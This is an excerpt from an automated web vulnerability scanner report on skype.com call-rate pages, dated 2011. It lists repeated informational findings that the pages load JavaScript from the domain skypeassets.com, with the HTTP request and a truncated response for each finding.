   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.651. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-belize  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-belize

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-belize HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:37 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.652. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-benin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-benin

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-benin HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:38 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.653. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bermuda  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-bermuda

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-bermuda HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:39 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.654. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bhutan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-bhutan

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-bhutan HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:39 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.655. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bolivia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-bolivia

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-bolivia HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:39 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.656. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bosnia-and-herzegovina  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-bosnia-and-herzegovina

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-bosnia-and-herzegovina HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:39 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.657. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-botswana  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-botswana

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-botswana HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:40 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.658. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-brazil  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-brazil

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-brazil HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:40 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.659. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-british-indian-ocean-territory  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-british-indian-ocean-territory

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-british-indian-ocean-territory HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:40 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.660. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-british-virgin-islands  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-british-virgin-islands

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-british-virgin-islands HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:14 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.661. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-brunei  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-brunei

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-brunei HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:41 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.662. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bulgaria  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-bulgaria

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-bulgaria HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:41 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.663. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-burkina-faso  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-burkina-faso

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-burkina-faso HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:41 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.664. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-burundi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-burundi

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-burundi HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:41 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.665. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cambodia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-cambodia

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-cambodia HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:41 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.666. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cameroon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-cameroon

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-cameroon HTTP/1.1
